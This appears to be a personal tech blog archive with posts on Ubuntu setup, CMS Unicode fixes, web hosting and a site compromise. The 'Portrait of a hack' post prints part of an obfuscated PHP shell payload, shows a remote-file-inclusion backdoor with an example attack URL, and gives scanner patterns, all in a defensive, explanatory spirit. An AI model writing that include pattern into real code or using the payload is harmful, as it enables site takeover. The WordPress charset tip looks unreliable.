Showing posts with label Technology. Show all posts

Wednesday, June 16, 2010

Netconnect on Ubuntu

I had a very good experience with Ubuntu's Lucid Lynx. I was trying to get my Reliance Netconnect USB stick to work on my Ubuntu laptop. It turned out to be much simpler than I initially thought - even simpler than setting it up on Mac OS or Windows.

Here are the steps:

  1. Put the stick in the USB port
  2. Open System -> Preferences -> Network Connections
  3. Click on the Mobile Broadband tab
  4. Click Add
  5. In the New Mobile Broadband Connection window, select HUAWEI Technologies HUAWEI Mobile from the mobile broadband device dropdown (your device name may be different)
  6. Click Forward. Select India from the Country list
  7. Click Forward. Select Reliance from the Provider list (Tata Photon+ and Tata Plug2Surf are also listed there)
  8. Click Forward. Click Done.
  9. Select Reliance Connection in the Mobile Broadband tab and click Edit
  10. In the Edit window's Mobile Broadband tab use:
    • Number: #777
    • Username: <your device's mobile number>
    • Password: <your device's mobile number>
  11. Click Apply
You are done. Now the Network Connection icon on the top-right panel will show an entry for Reliance Connection. Click on it to connect.
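For those who prefer the command line, the same settings can be expressed as a wvdial configuration. This is a sketch, not from the original post: the device path /dev/ttyUSB0 and the baud rate are assumptions that may differ on your system. Save it as /etc/wvdial.conf and run `sudo wvdial`:

```ini
[Dialer Defaults]
; Serial device the USB stick exposes (check dmesg; often ttyUSB0)
Modem = /dev/ttyUSB0
Baud = 460800
Init1 = ATZ
; Reliance (like other CDMA EVDO providers) dials #777
Phone = #777
Username = <your device's mobile number>
Password = <your device's mobile number>
; Start pppd immediately instead of waiting for a login prompt
Stupid Mode = 1
```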

Sunday, March 29, 2009

Resume parsing score

I found this on the Web. Being a programmer, I found it funny, but quite true.

 Resume Chart


[Source: http://www.hanovsolutions.com/resume_comic.png]

Thursday, March 26, 2009

Wordpress and Unicode

You type some non-English characters into the WordPress or Drupal editor. You save, only to find those characters have become ????. If this describes your problem, then you have a Unicode issue: you need to turn on Unicode support for WordPress or Drupal, which requires a small change. Both WordPress and Drupal support Unicode; however, by default, the databases are not configured to store Unicode characters.

WordPress


For WordPress, the modification is straightforward.

  1. Open up ‘wp-config.php’ from the root directory of your WordPress installation.

  2. Comment out the following two lines by adding ‘//’ at the very beginning of each:
    define('DB_CHARSET', 'utf8');
    define('DB_COLLATE', '');


So that section should now look like this:
//define('DB_CHARSET', 'utf8');
//define('DB_COLLATE', '');

[Source: http://hansengel.wordpress.com/2007/10/09/wordpress-unicode-and-s/]

Drupal


For Drupal, the change is a bit more involved:

  1. Go to the root directory of your Drupal installation.

  2. Create a file named collate_db.php in that directory.

  3. Put the following code in it:
    <?php
    # Update the $connect_url line below with your installation's database
    # settings; do not change anything else.
    require_once("includes/bootstrap.inc");
    require_once("includes/database.inc");
    require_once("includes/database.mysql.inc");

    $connect_url = 'mysql://user:pwd@server/database';
    $active_db = db_connect($connect_url);

    # List every table in this database
    $sql = 'SHOW TABLES';
    if ( !( $result = db_query($sql) ) ) {
        echo 'SHOW TABLES - SQL Error: ' . $result . "<br>\n";
    }

    # Loop through all tables in this database
    while ( $tables = db_fetch_array($result) ) {
        $table = $tables[key($tables)];

        # Set the table's default collation to UTF-8
        if ( !( $result2 = db_query("ALTER TABLE %s COLLATE utf8_general_ci", $table) ) ) {
            echo 'UTF SET - SQL Error<br>' . "\n";
            break;
        }
        print "$table changed to UTF-8 successfully.<br>\n";

        # Now loop through all the fields within this table
        if ( !( $result2 = db_query("SHOW COLUMNS FROM %s", $table) ) ) {
            echo 'Get Table Columns Query - SQL Error<br>' . "\n";
            break;
        }

        while ( $column = db_fetch_array($result2) ) {
            $field_name = $column['Field'];
            $field_type = $column['Type'];

            # Convert only the text-based field types
            $text_field_types = array('char', 'text', 'enum', 'set');
            foreach ( $text_field_types as $type ) {
                if ( strpos($field_type, $type) !== false ) {
                    $sql4 = "ALTER TABLE $table CHANGE `$field_name` `$field_name` $field_type CHARACTER SET utf8 COLLATE utf8_bin";
                    $result4 = db_query($sql4);
                    echo "---- $field_name changed to UTF-8 successfully.<br>\n";
                }
            }
        }
        echo "<hr>\n";
    }
    ?>



  4. Look at the line near the top of the code that sets $connect_url. You have to replace that part with your installation-specific information.

  5. Open the file sites/default/settings.php under the same Drupal root directory. Copy everything after the '=' on the line that starts with
    $db_url =

    and paste it after
    $connect_url = 

    in the above code.

  6. Save collate_db.php

  7. Open a browser and request collate_db.php from your site.

  8. If everything went fine, you should see something similar to this:
    access changed to UTF-8 successfully.
    ---- mask changed to UTF-8 successfully.
    ---- type changed to UTF-8 successfully.

    <--- Lines not shown --->

    watchdog changed to UTF-8 successfully.
    ---- type changed to UTF-8 successfully.
    ---- message changed to UTF-8 successfully.
    ---- variables changed to UTF-8 successfully.
    ---- link changed to UTF-8 successfully.
    ---- location changed to UTF-8 successfully.
    ---- referer changed to UTF-8 successfully.
    ---- hostname changed to UTF-8 successfully.


  9. Delete collate_db.php for security.


You are done.
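If you would like to preview the SQL before running anything against a live database, here is a quick sketch (Python, my addition, not part of the original post) that generates the same ALTER statements the collate_db.php script issues, given a table name and its SHOW COLUMNS output:

```python
# Sketch: reproduce the ALTER statements issued by collate_db.php,
# so the SQL can be reviewed before touching a real database.

# Only these text-based column types need a character-set change
TEXT_FIELD_TYPES = ("char", "text", "enum", "set")

def collation_statements(table, columns):
    """table: table name; columns: list of (field_name, field_type) pairs
    as returned by SHOW COLUMNS. Returns the ALTER statements for the table."""
    stmts = [f"ALTER TABLE {table} COLLATE utf8_general_ci"]
    for name, ftype in columns:
        if any(t in ftype for t in TEXT_FIELD_TYPES):
            stmts.append(
                f"ALTER TABLE {table} CHANGE `{name}` `{name}` {ftype} "
                "CHARACTER SET utf8 COLLATE utf8_bin"
            )
    return stmts

if __name__ == "__main__":
    # Hypothetical columns for the 'access' table shown in the sample output
    demo = [("mask", "varchar(255)"), ("hits", "int(11)"), ("type", "varchar(16)")]
    for stmt in collation_statements("access", demo):
        print(stmt)
```

Integer columns like hits are skipped, matching the script's behavior of converting only char, text, enum and set types.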

[Source: http://www.urbannatives.net/localtreechild/..._ci_and_tabl ]

Wednesday, February 04, 2009

Ain’t No Luddite

I am not an early adopter. I don't work to stay ahead of the technology curve. Rather, I fall quite far back on that curve and watch all my friends and most of my family and acquaintances pass me and my wife by. But the truth is that I am quite happy and content being a follower. I keep my OS at least one version behind the latest and the greatest. Currently, even though my sparingly-used Windows machine runs XP (used only for music production, since I have already invested money and learning time in software that runs only on Windows), I have the latest OS version (Ubuntu Intrepid Ibex 8.10) on my primary home machine. I resisted having a cell phone for quite some time before finally jumping on the bandwagon in 2003. Even then, I have a pretty basic cell phone which is used as a - surprise! surprise! - phone to call people. No BlackBerry, no iPhone, no Android, no nothing. We don't have an LCD or plasma TV, mostly because we don't need one. We don't watch TV or movies that much. 90% of the time, our TV is playing either a Baby Einstein DVD or a PBS Kids show. Our DVD player is a $25 Coby. My home theater is an 8-year-old system. My Bose Acoustimass speakers are sitting comfortably in the closet, gathering dust. In the five-and-a-half years since we moved into this house, I haven't had the energy, the urge, or a serious nudge from Paramita to hook them up. On the social-networking side, I got onto Orkut after having a dormant account for quite a while, thanks to Paramita for finally making me active there. But that was almost one-and-a-half years ago. By that time most of my friends there had moved on to the greener pastures of Facebook. I have too. But only recently. And I am still trying to figure things out there. Now I see people are using Twitter. I guess it will take me at least a year or two before I get onto Twitter.

The reason I started this post is that I think the best thing that has happened in the last two years on the technology side, as far as I am concerned, is Pandora. It's really awesome. For those who haven't yet found Pandora: it's built on the Music Genome Project. The site says:
Together we set out to capture the essence of music at the most fundamental level. We ended up assembling literally hundreds of musical attributes or "genes" into a very large Music Genome. Taken together these genes capture the unique and magical musical identity of a song - everything from melody, harmony and rhythm, to instrumentation, orchestration, arrangement, lyrics, and of course the rich world of singing and vocal harmony. It's not about what a band looks like, or what genre they supposedly belong to, or about who buys their records - it's about what each individual song sounds like.

So the idea is that you start with one of your favorite songs. Then, based on the musical attributes of that song, Pandora will select other songs. For each song, you can tell Pandora whether you like it or not, thereby 'training' Pandora to your taste. You can create 'Radio Stations' based on a song; a 'Radio Station' can be created by artist or by genre too. There is a cool feature called Quick Mix, which is basically a random play of songs from the Stations you have selected.

It's really easier to experience and experiment with Pandora than to explain how it works. You need to register to create Stations, but registration is free and requires very little information. However, there is one caveat: the service is only for a North American audience. I understand that is due to some licensing issue. If you are in North America (or have a North American IP address ... wink wink), go there and have some wonderful musical experience.

Monday, February 02, 2009

Monday, January 05, 2009

Fast food for thought

I just rebooted my office machine running CentOS 4.6, which is based on the Red Hat Enterprise distribution. It had been running for 121 days, i.e. almost 4 months!!

Ubuntu Intrepid and vpnc

My company has a decent work-from-home policy. Every Thursday we can work from home, and most do, including myself. In addition to the regular Thursdays, we work from home whenever there are project deadlines - which is almost always. Hence a solid VPN connection is a must for me.

My last non-Ubuntu desktop was Fedora. I compiled the Cisco vpnclient and used it without a problem. When I switched to Ubuntu Edgy (6.10) I started using the open-source vpnc, which worked quite nicely. The upgrades to Feisty (7.04) and Gutsy (7.10) worked fine too. But from Hardy (8.04), the problem of dead-peer detection raised its ugly head. There were patches available, but they didn't solve the problem for me. I was looking forward to the Intrepid (8.10) release, hoping that the vpnc issue would be resolved for good. After Intrepid was released there were contradictory reports about whether the dead-peer-detection issue had been resolved. I decided to test it out myself. So I upgraded to Intrepid.

vpnc can be used from the command line, or one can install the vpnc plugin for network-manager (nm) and control the vpnc connection from the network-manager applet. Until now I had only used the command line, but this time I tried both for testing. This is what I found:

  • The dead-peer-detection issue is solved in both the command-line client and the network-manager plugin, when you pass a dead-peer-detection interval of 0 to the command-line program or check a box in the network-manager plugin.

  • The network-manager plugin has a bug that overwrites resolv.conf when the VPN is disconnected. I forget the exact nature of the bug, but basically it didn't revert to the original resolv.conf after the VPN session ended. The bug may apply only to static IPs.

  • Even with the dead-peer-detection issue resolved, my VPN connection would stall for a minute or two, then continue, after I had typed about 10-15 characters in my SSH window. And this repeated over and over again. Googling the problem suggested something to do with the routing table and/or DNS lookup. I tried different things for a while, but none resolved the issue.
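For reference, this is roughly what disabling dead-peer detection looks like outside the GUI. The gateway, group and username below are placeholders; the key line is the DPD idle timeout of 0, which corresponds to vpnc's --dpd-idle 0 command-line flag:

```
IPSec gateway vpn.example.com
IPSec ID examplegroup
IPSec secret examplesecret
Xauth username myuser
# 0 disables dead-peer detection entirely
DPD idle timeout (our side) 0
```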


At last I gave up and went back to the proprietary Cisco vpnclient. I compiled and installed it following this post. Since then I have had a smooth VPN ride. I would love to go back to the open-source vpnc client, but not at the expense of connection stability. I need to earn my bread.

Sunday, May 11, 2008

Portrait of a hack

It's been a long time since I updated the page. Again. As I was intending to update the page with the report of my latest endeavor, something unexpected happened.

Last Sunday morning, I woke up to a terse mail from my hosting company - HostMonster - saying that my basus.net account had been deactivated due to a "terms of service violation". So I called them. The tech-support guy confirmed that the account had indeed been deactivated because there was a phishing page lurking inside my site. He suggested that I talk to their abuse department. Even though it was a Sunday, there was somebody in the abuse department I could talk to. She pointed me to a directory called 1/ inside my webroot folder. That, and a few other files, seemed to be gratuitous contributions from the hackers. She said once I removed the offending pages and they confirmed that I had, they could reactivate the account. I got off the phone and the first thing I did was remove the 1/ directory. Looking back, I think that was a knee-jerk reaction; I could have avoided it. I then moved my original webroot folder aside and put up a placeholder page instead. After these minor surgeries I called my hosting company's abuse department again. She looked at the directory to confirm that the offending pages were really gone. Once confirmed, she immediately reactivated my account. I briefly chatted with her about the possible backdoor and inquired if they had any tool to sniff out backdoors. They don't have any such tool, but she gave me pointers to some usual-suspect applications. Fortunately I didn't have any of those applications. However, that's unfortunate too, since now I have to hunt for the backdoor manually myself. It also means that the backdoor is possibly an inadvertent creation of my own sloppy coding. Tooo baad.

But one thing I want to mention here, I found my hosting company's support impeccable. They were helpful, to-the-point and not too finicky. Deactivating my site showed they had a good policy in place against questionable content. Kudos.

Once my mail server etc. were back online and the offending material offline, I had a few tasks at hand. In order of priority, they were:

  1. Remove all injected files and content

  2. Find and fix backdoor

  3. Put site back online


So, here are some interesting things I found along the way. These must be well documented on some security website, but here is what I found firsthand.

Modus Operandi: Once the hackers find a backdoor, they push a file through it. This file then becomes the hackers' gateway. They come and go through this door at will. They can pretty much see what's inside, put files (scripts) there, and sometimes hijack the site.

File Extensions: Some of the initial files that the hackers uploaded had .jpg extensions, but they are actually PHP scripts - for example, php3.jpg, lila.jpg or sh6.jpg. I think they want the site owner to overlook any .jpg file, assuming image files are harmless. The PHP engine, though, is not fooled by the extension: it will execute a file with any extension as long as it contains valid PHP code.

Offending files: The most interesting is php3.jpg. It looks like a binary file:

 <? eval(gzinflate(base64_decode('
7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm
B69VdTxCCJBZhCUBNv3WBZ1r+P59V3YicpFSCzau
qu5ZzvRMt1EukZFbZERkZMRvJx9+mw6mf/2LorQc
1XKMSV/S1NHI/utfjJ60+a43m2iOYU7u9SfDduxN
ua87Y0OzTMcY6/LWlvQ7LyGJOZuQMYIKmxszW9di
0gb8d0v6KOlP05HZ1TdlSY5JQumtY8nSnZk1kTY3
eyNTdbZIRWlb4p8I4Pjr17/+Rbcs07q39KlJsN3c
2zr+61/+bvQnpqXfQyXrXu1A1ma7eVkgWbbu3I/V
vqHdP85MR7fvrdmEtJrA7I2FMQHEbMdyzJG50K1N
e9aBr836Wf2+1oolYrvQy48fJRkKylChq/eMCfTA
xuEioxDz9xyh4tj1g+32p9omjlj0wEKbxtT2DylN
2/x5Q7Ws2Mbwoyyz6oZ9D0nq8ybmkCrQe1UbkG9J
tSUofLIxZ6VJ52bTKXRuY7glvYPOnJZr2Uy5hfBY
I1jzk7wxlL/gOH+V9JGtS78TeB8ZIiPVHui0JC3D
qzJokAgDet8sNC4LrTZUIzjej3Wrr29u3OdqtYtS
IbZxf1pow3/rtVYbx8pF3a0YxP+dYcMkbm4A8pAC
fwD0xpysBmjPHsx1xFFOxhPS1NJ3LH2kq4B8Z2aM
utJPyX35WFKU3Myy9IkjQWEbxhZXfK5WLZZOL5uZ
dqlWlTLVvNQqtNul6mmLrX59PHVgjGcTXEP2zBph
+/BbM82hAWtAOzqyByRDhhW8gT8QERnHAcdPBCKC


However, if you look closely, you will notice that it starts with "<? eval(gzinflate(base64_decode('". This tells the PHP engine to decode and inflate the compressed, base64-encoded content that follows, and then execute it. When I inflated it, it turned out to be an HTML page, which looks like this in a browser:

PHP Shell Screenshot
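A safe way to see what such a payload hides is to reverse the encoding offline instead of letting PHP eval() it. Here is a sketch in Python (my addition, not from the original post; PHP's gzinflate() corresponds to raw DEFLATE, which zlib handles with a negative window size):

```python
import base64
import zlib

def gzdeflate(data: bytes) -> bytes:
    """Compress with raw DEFLATE - the inverse of PHP's gzinflate()."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)  # wbits=-15 means raw deflate
    return c.compress(data) + c.flush()

def gzinflate(data: bytes) -> bytes:
    """Decompress raw DEFLATE - equivalent to PHP's gzinflate()."""
    return zlib.decompress(data, -15)

# Simulate the obfuscation with a harmless stand-in payload
payload = b'<?php echo "owned"; ?>'
blob = base64.b64encode(gzdeflate(payload))

# What eval() would have seen after base64_decode + gzinflate:
recovered = gzinflate(base64.b64decode(blob))
print(recovered.decode())  # prints: <?php echo "owned"; ?>
```

The same gzinflate() function, pointed at the blob from a real php3.jpg (everything between the quotes), reveals the hidden script without executing it.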

Backdoor: There were a couple of backdoors in my site (at least, those are the ones I found). All of them are similar.

A PHP script can run another script by calling a function named include(). Suppose you have a script named foo.php and another named bar.php. In foo.php you may have a call like:
include('bar.php');

Now if you request foo.php from a browser, it will also execute bar.php, even though bar.php was not explicitly called or requested.

Now, bar.php does not need to reside in the same directory or even on the same file system. bar.php may be sitting on a different webserver, 10,000 miles away, reachable via an HTTP call - http://bar.com/bar.php. foo.php can still execute bar.php over HTTP. Your include will simply say:
include('http://bar.com/bar.php');

PHP will take care of opening a socket to the bar.com server, creating an HTTP request for bar.php, and executing its content after receiving the HTTP response.
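As an aside: assuming a reasonably recent PHP (5.2 or later), this remote-include behavior can be switched off globally in php.ini, which closes this whole class of hole:

```ini
; Disallow include()/require() of remote URLs (Off by default since PHP 5.2)
allow_url_include = Off
; Optionally also disallow remote reads through fopen() wrappers
allow_url_fopen = Off
```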

Now, suppose that instead of the hard-coded http://bar.com/bar.php as the argument of the include() call, you pass a request parameter - something you got via a POST or a query string:
$myscript = $_REQUEST['myscript'];
include($myscript);

Now you have a backdoor. How so? If a malicious hacker knows about these two lines, she can make a request to foo.php like this:
http://<servername>/foo.php?myscript=http://<hackersserver>/malicious_script.php

foo.php will obediently execute whatever malicious_script.php asks it to do. Now, the question is: how do the hackers know about those two lines of code? By looking at other links on your site (or on other sites that link to your site) and guessing. This is not difficult.

This is precisely the backdoor I had. Three of them, in fact. I think the hackers exploited two of the three. I have fixed the code - or I think I have, until the hackers expose another backdoor. I have also written a couple of monitoring and reporting scripts that will periodically look for any change in my site. Let's see what happens.
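In the same spirit as those monitoring scripts, here is a rough sketch of such a scan (Python, my own illustration - the signatures and extensions are assumptions drawn from the files described above, not an exhaustive list):

```python
import os
import re

# Byte patterns seen in the injected files described above
EVAL_SIG = re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode")
PHP_TAG = re.compile(rb"<\?")
IMAGE_EXTS = (".jpg", ".jpeg", ".gif", ".png")

def scan_webroot(root):
    """Return paths of files that look like disguised PHP payloads."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                head = f.read(64 * 1024)  # a signature will be near the top
            if name.lower().endswith(IMAGE_EXTS):
                # Any PHP open tag inside an "image" is a red flag
                if PHP_TAG.search(head) or EVAL_SIG.search(head):
                    hits.append(path)
            elif EVAL_SIG.search(head):
                # eval(gzinflate(base64_decode(... inside a real script
                hits.append(path)
    return hits
```

Point scan_webroot() at a copy of the webroot; anything it returns deserves a manual look.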

In a subsequent post, I will try to write more about the files the hackers put there.

Update: I never got a chance to write more about the files the hackers uploaded. However, there is one more thing of importance here. The hackers modified my root .htaccess file. That's the configuration file for the Apache web server, and it affects the tree underneath unless overridden by another local .htaccess file. They put a Rewrite rule in the .htaccess. An Apache Rewrite rule can basically modify a request line. For example, a browser may request a file called "foo.html"; via a Rewrite rule, you can serve some other file, say "whatever.html". Since this happens without the browser's knowledge, the browser still thinks it got the requested foo.html file. That's exactly what happened in my case. The hackers wrote a rewrite rule in such a way that if a request came through a search result (identified by the Referer header), it showed a Viagra ad page that they had uploaded. And be careful: they buried the Rewrite rule in the .htaccess file after a bunch of blank lines, so that when you open the file in an editor, you won't see it without scrolling down. Very clever.
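For illustration, a rule of that shape would look roughly like the following. This is my reconstruction with placeholder names, not the attackers' actual rule:

```apache
RewriteEngine On
# Only visitors arriving from a search engine results page get rewritten
RewriteCond %{HTTP_REFERER} (google|yahoo|msn)\. [NC]
# ...and are silently served the uploaded spam page instead
RewriteRule ^.*$ /1/spam-page.html [L]
```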

Friday, December 21, 2007

A Tale of Java, Ubuntu and Fonts

As part of an ongoing Java project, I had designed a rudimentary Java text editor. The project is a WIP, so every so many months I put my mind to it, only to stray away in a few days. The last time I worked on the editor part of it, I was running Fedora Core with Java 1.4, maybe 1.5. The code loads a non-English font into the editor, and then you can see those characters as you type. The font is a TTF font, which was loaded as a system font in the /usr/share/fonts directory with the font cache updated. It worked just fine, loading and showing this font (its name, BTW, is itxBeng; it's a Bengali font) without any glitch.

A couple of weeks back, I opened up the code on my Ubuntu 7.04 with Java 1.5. And surprise, surprise!! Where I was supposed to see Bengali characters, I now saw gibberish. My first reaction was that I might have changed some code and forgotten about it - I told you, I hadn't touched this code in a while. So I looked at the font-loading code, but did not find any problem or resolution. I was furiously scratching my head. No clue what was happening!

The next day I ran the code on my office computer, which runs CentOS 4 (basically a repackaged Red Hat distribution) and Java 1.5. To my not-so-big surprise, the fonts loaded just fine. So I narrowed the issue down to an Ubuntu problem. Next, I installed Java 1.6 on my Ubuntu machine. This time the fonts loaded fine. I haven't played with it extensively since, so I don't know if there are other problems. But the most intriguing problem is gone, or at least I have found a workaround.

Bottom line: Ubuntu 7.04, Java 1.5, and TTF fonts manually loaded into the system do not play well together.

Friday, November 09, 2007

One more host change

For the past few days I have been busy accommodating another change of host. This is my second change in as many months. I had been hosting with 1and1.com since 2005. It was a decent host - excellent, top-notch service as far as server uptime, availability and speed are concerned. However, two peeves I had were that it didn't offer enough features for the dough, and that there was no ssh service for my plan. 1and1.com also seems to have configured its service in a nonstandard way. For example, even with your own domain, your mail server's domain will be 1and1.com; and you cannot choose your own username for login - you are forced to remember some random string of digits.

So I moved my host to Dreamhost in October. It has a very impressive array of features for a very decent price. I have seen its servers hold quite firm after a Digg effect on one of the domains it hosted. I also read some reviews which, even though they didn't put it in the top-performer slot, nevertheless put it somewhere near there. Since my site is a very, very low-traffic site, I didn't bother. But I should have. After moving, I spent quite a bit of time redesigning my site, only to discover that server response was not very good - barely acceptable. But the real damper was its mail server. The server that hosted my mailserver had a history of problems, and Dreamhost was in the process of upgrading the hardware when I moved my host. Dada was complaining that he basically couldn't do anything in his mailbox. He was connecting via IMAP. The only thing he could do was download the headers; the server timed out 9 out of 10 times while downloading the body. I thought it was temporary. But even after the claimed hardware upgrade, things didn't improve. At that point I decided to quit. To be fair, I must say that I didn't have any problem connecting to the mail server using POP3. In conclusion, I think Dreamhost has good intentions and all the makings of a good host, but it may need to put a lot more focus on performance at this time.

Then enters HostMonster. I read very good reviews about this host. More than one review site puts it at the top of the heap. It claims to host more than 200,000 domains. Even though most things are almost the same across Linux hosts, they have enough differences in settings to warrant at least a couple of days of tweaking my code to run seamlessly. Same story here. Finally, I think I am done. The jury is still out, but so far I am seeing improved access speed. Dada informed me that he now has no problem with his mail connection using IMAP. Hopefully I can stay with these guys for some time.

Tuesday, October 23, 2007

SandR, Java, Perl and Regular Expression

A couple of years ago, I wrote a small utility for searching and replacing text in files. At the time, I was looking for such a tool and found none suitable enough for my needs. So I wrote one and released it as open source software (OSS) so that others could freely download it, use it and, if needed, modify it. I called it SandR (pronounced sand-arr). It was not hugely popular; people downloaded it sparingly. As of today there are altogether 1,288 downloads. I would love to see that number go up; nonetheless, it was satisfying to know at least some people found it useful.

I released it as a pre-alpha version, which in the software business means, "Feel free to use it, but do expect to see bugs and crashes". Not too many bugs were reported in the last two years, so I decided to upgrade it to "Production/Stable" status. In the process I tweaked the code for minor enhancements. Today, I requested a release.

The unique feature of SandR is that it supports auto-detection of file encoding. I used the Java port of Mozilla's character-detection algorithm to detect the character encoding of the files. SandR also supports regular expressions in the search string, although some other similar OSS utilities provide regex support as well.


It's really very useful that Java now supports regex, or regular expressions. Previously, regex was the power tool of Perl programmers only. GNU had a C library for regex, but it was really the forte of Perl. So when Java started supporting regex (with java.util.regex, introduced in Java 1.4), programmers welcomed it enthusiastically. However, as we delved more into it, we found there are some differences between Perl and Java regex - nothing major, though. Anyone conversant with one will have absolutely no difficulty understanding and using the other. But why? Why do there have to be two flavors of the same utility, however small the differences? Techies and programmers have been using regex for ages. They have become very conversant with the Perl flavor. Then why, oh why, introduce a minor variation? This is so Microsofty. Sun can do better. I haven't tried Java 6 yet, since I do not use Java in my day job regularly, but I doubt Sun has changed the regex implementation. I don't know the plans for the upcoming Java 7 release. But let's request that Sun abolish whatever minor differences there are between the Java implementation of regex and its Perl counterpart. You can do it, Sun.

Thursday, October 18, 2007

Web 2.0

The place where I live, the San Francisco Bay Area, witnesses constant hype about technology. It also witnesses cyclical economic upturns and downturns, like any other place on earth. By most accounts, right now we are going through an economic upturn here in Silicon Valley. It's getting easier for startups to get funding; mature startups are getting unsolicited funding proposals; even startups without any revenue - or even without any solid business plan toward revenue - are getting huge chunks of money to 'acquire customers'. The job market is hot. Good engineers on the lookout frequently end up with 3 or more viable job offers. Engineers who are not up for grabs are getting unsolicited calls or emails from recruiters. It's 1999 all over again. The only difference is that the stock market is not yet showing "irrational exuberance", as Alan Greenspan once put it.

Take the case of Web 2.0 (pronounced "web two dot oh"). There is a conference going on right now in San Francisco on Web 2.0. The first day was sold out, with registration fees running into the thousands. That shows there is a lot of interest and enthusiasm about Web 2.0. The tech blogs are constantly chattering about Web 2.0. Tech columnists are dropping the term generously. Every other site is claiming that it is 'Web 2.0 enabled'. Now go and ask 5 people what Web 2.0 actually is. You will get 5 different answers, with a couple more extra as bonuses. And chances are that all of them start with, "To me, Web 2.0 is ...". That proves beyond any doubt that there is no definition, no coherent semantic explanation of the term, yet everybody is extremely excited about it. What better definition of hype could there be!

First there was the natural-language search engine, then there was the Semantic Web, then Internet 2.0 (which, by the way, is still alive but may not be kicking hard). There were SOA (Service-Oriented Architecture), middleware, thin clients ... welcome to hype-land.

Tuesday, October 16, 2007

Gutsy Gibbon coming!

A new Ubuntu release is due in a couple of days: Gutsy Gibbon, Ubuntu 7.10 (10th month of the year 2007). The RC is out and has been reviewed. It got good reviews, as usual. I remember my first experience with Ubuntu. I blogged about it back on November 27, 2006 - reproduced here:

It was the Thanksgiving weekend. After doing the compulsory chores of eating and drinking merrily, taking a day trip for picnicking, etc., I had enough time to fiddle with my home machine - the main one, which was running Fedora Core 4. I decided that it was time to upgrade it to FC6, which had come out the previous month. Historically I have upgraded every other FC release: started with FC2, skipped FC3, upgraded to FC4, skipped FC5. Well, that's not much history, but you get the idea.


I fired up my BitTorrent client - Azureus - downloaded the FC6 torrent file, and started downloading the 3.6 GB DVD image of FC6. Then I went to Thanksgiving dinner at Dada-BoThan's place. I came back and the DVD image was sitting there, ready to be burnt. I double-checked that the download was right by computing the SHA1 sum and matching the signature with the one provided on the FC site. I put a blank DVD into the drive, fired up k3b, and started burning the image onto the disc. I decided that that was enough for the day and went to bed.

Next morning, the disc was ready. So far so good. I rebooted the machine. While the machine was rebooting, I changed the BIOS settings to boot from the DVD instead of the hard drive. Sure enough, the FC6 installation screen came up; I hit enter and was on my happy way to upgrading my machine. Well, not so fast. The media test (which is, by the way, an optional step during installation) said the media was faulty. Hmmmm. I took the risk and went ahead with the installation anyway. But sure enough, after a while the installation freaked out, saying it could not read a certain package from the disc. Hm, I thought, the SHA1 sum was right, so it must be the burning process. So I went back to my FC4 and burnt another image onto another disc. Same process of rebooting, with the same result: media integrity test failed.

I did the next thing one is supposed to do: googled to see if anybody else had the same problem. Sure enough, a lot did.

At that point, I had to leave, since we had a picnic planned for the day. The forced break was good, since it gave me enough time to think about the situation. Sure, I could leave the system with FC4. It was working quite OK for my purposes. I had tweaked it to have all my required applications running fine; the peripherals were working fine too. Why fix something that ain't broken? On the other hand, I had been itching to see all the new things that had happened in the brave new world of Linux and Open Source since the time of FC4. Should I spend the rest of my weekend figuring out a way to get FC6 installed? An iffy path at best. The other option was to use some other distro: maybe Ubuntu? OpenSUSE? CentOS?

I am using CentOS at work. It's a solid distribution based on Red Hat. I know it works well. A known devil is better than an unknown? But it's still based on Red Hat, which means there is not much room to play around, since I know that distro quite well.

OpenSUSE? Not right now, after the Novell-Microsoft deal. I am not sure whether Novell has sold its soul to the devil (as a lot of Open Source people are saying). I would rather wait and see what it all means.

Ubuntu seems to be a nice choice. distrowatch.com says it is the most popular distro right now. There is a lot of buzz about Ubuntu in this part of the world too. They also released their latest, 6.10, last month, and there are some very good reviews.

On the downside, this means I have to back up a lot of stuff, just in case. But my new 320 GB USB hard drive was delivered just last Wednesday, which means backing up is easy now. Decision made: let's go the Ubuntu way.

I came back home, downloaded the Ubuntu torrent, fired up Azureus and started downloading the CD image. I was very pleasantly surprised that the Ubuntu installation can be done with only one CD. Great! The image finished downloading in no time. I burnt it to a CD and waited for my almost 50 GB backup to finish.

Once the backup was done, I started installing Ubuntu. It doesn't have a graphical installer like FC does (anaconda), but it was enough for my purpose. Moreover, you don't have to select your packages at installation time, which was good: it made the installation process quick and sweet.

Installation was done in a few minutes. I rebooted, and the system came up much faster than FC4 ever did. I plugged in my USB hard drive, and Ubuntu immediately recognized it. It recognized the network automatically too, and on the very first go I was on the internet, which I connect to through a DSL router. Next stop: printer setup. I have a Brother DCP 1000. With FC I had to do some work to get my printer working, but with Ubuntu's printer setup applet the system found my printer, though it thought it was a Brother DCP 1200. With a little googling I found the right driver for the DCP 1000 and set it in the printer's properties applet (no need to download or install anything; the driver came with the distribution), and my printer was set up.
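What the printer applet does can also be done by hand with the CUPS command-line tools, which is handy when the applet guesses the wrong model. This is only a sketch: the device URI and driver entry below are illustrative placeholders, and the real values have to be read off your own system with `lpinfo`.

```shell
# List the drivers CUPS knows about and find the right DCP entry
lpinfo -m | grep -i 'DCP'

# List detected printer devices to get the actual device URI
lpinfo -v

# Create the queue with the correct driver (URI and driver name below
# are placeholders -- substitute the entries printed by lpinfo above)
lpadmin -p DCP1000 -E \
        -v usb://Brother/DCP-1000 \
        -m the-driver-entry-from-lpinfo.ppd
```

`-E` enables the queue and makes it accept jobs; after that, `lp -d DCP1000 file.txt` should print.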

Next: sound. By default, ALSA keeps the Wave Surround channel muted. I opened the Sound Preferences applet, unmuted the Wave Surround channel, and I had my sound. (BTW, I have an SBLive! sound card.)
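The same unmute can be done from the command line with ALSA's `amixer`, which is useful if the applet isn't around. A sketch, not verified on an SBLive!: mixer control names differ from card to card, so list them first and substitute whatever your card calls the channel.

```shell
# List the simple mixer controls this card exposes (names vary per card)
amixer scontrols

# Unmute the channel that ships muted and give it a sensible volume
# ('Wave Surround' is the name on the emu10k1/SBLive! driver)
amixer sset 'Wave Surround' unmute
amixer sset 'Wave Surround' 80%
```

Running `alsactl store` afterwards saves the mixer state so the channel stays unmuted across reboots.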

